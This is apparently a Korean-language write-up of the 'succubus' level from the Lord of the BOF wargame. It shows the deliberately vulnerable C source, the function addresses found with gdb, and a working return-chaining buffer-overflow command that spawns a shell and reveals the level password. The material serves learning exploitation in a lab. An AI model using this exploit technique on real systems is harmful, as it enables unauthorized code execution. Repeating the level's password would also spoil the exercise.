(LOB)level17.zombie_assassin

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously 

*/

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>

// the inspector

int check = 0;

void MO(char *cmd)

{

        if(check != 4)

                exit(0);

        printf("welcome to the MO!\n");

// olleh!

system(cmd);

}

void YUT(void)

{

        if(check != 3)

                exit(0);

        printf("welcome to the YUT!\n");

        check = 4;

}

void GUL(void)

{

        if(check != 2)

                exit(0);

        printf("welcome to the GUL!\n");

        check = 3;

}

void GYE(void)

{

if(check != 1)

exit(0);

printf("welcome to the GYE!\n");

check = 2;

}

void DO(void)

{

printf("welcome to the DO!\n");

check = 1;

}

main(int argc, char *argv[])

{

char buffer[40];

char *addr;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// you cannot use library

if(strchr(argv[1], '\x40')){

printf("You cannot use library\n");

exit(0);

}

// check address

addr = (char *)&DO;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with DO\n");

                exit(0);

        }

        // overflow!

        strcpy(buffer, argv[1]);

printf("%s\n", buffer);

        // stack destroyer

// 100 : extra space for copied argv[1]

        memset(buffer, 0, 44);

memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

// LD_* eraser

// 40 : extra space for memset function

memset(buffer-3000, 0, 3000-40);

}

소스가 굉장히 깁니다 .. 이번 문제는 어렵다 라기보다는 상대적으로 노가다성을 요구하는 문제엿습니다 

마찬가지로 라이브러리를 사용할수 없고, buf , buf +48+100 을 memset 해버립니다

자세한 내용은 생략하고, DO GYE GUL YUT MO 순서대로 지역변수를 콜해줘야 하는상황입니다( check 변수가 걸려있죠?)

따라서 함수 주소들을 구해주고 

(gdb) p DO

$1 = {<text variable, no debug info>} 0x80487ec <DO>

(gdb) p GYE

$2 = {<text variable, no debug info>} 0x80487bc <GYE>

(gdb) p GUL

$3 = {<text variable, no debug info>} 0x804878c <GUL>

(gdb) p YUT

$4 = {<text variable, no debug info>} 0x804875c <YUT>

(gdb) p MO

$5 = {<text variable, no debug info>} 0x8048724 <MO>

(gdb) 

[payload]

BUF|SFP |  &DO| &GYE|& GUL| &YUT |&MO |&AAAA |&/bin/sh| /bin/sh

[attack]

[zombie_assassin@localhost zombie_assassin]$ ./succubus $(python -c 'print "a"*44+"\xec\x87\x04\x08"+"\xbc\x87\x04\x08"+"\x8c\x87\x04\x08"+"\x5c\x87\x04\x08"+"\x24\x87\x04\x08"+"aaaa"+"\x98\xfa\xff\xbf/bin/sh"')

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?aaaa???bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ my-pass

euid = 517

here to stay

bash$ 

성공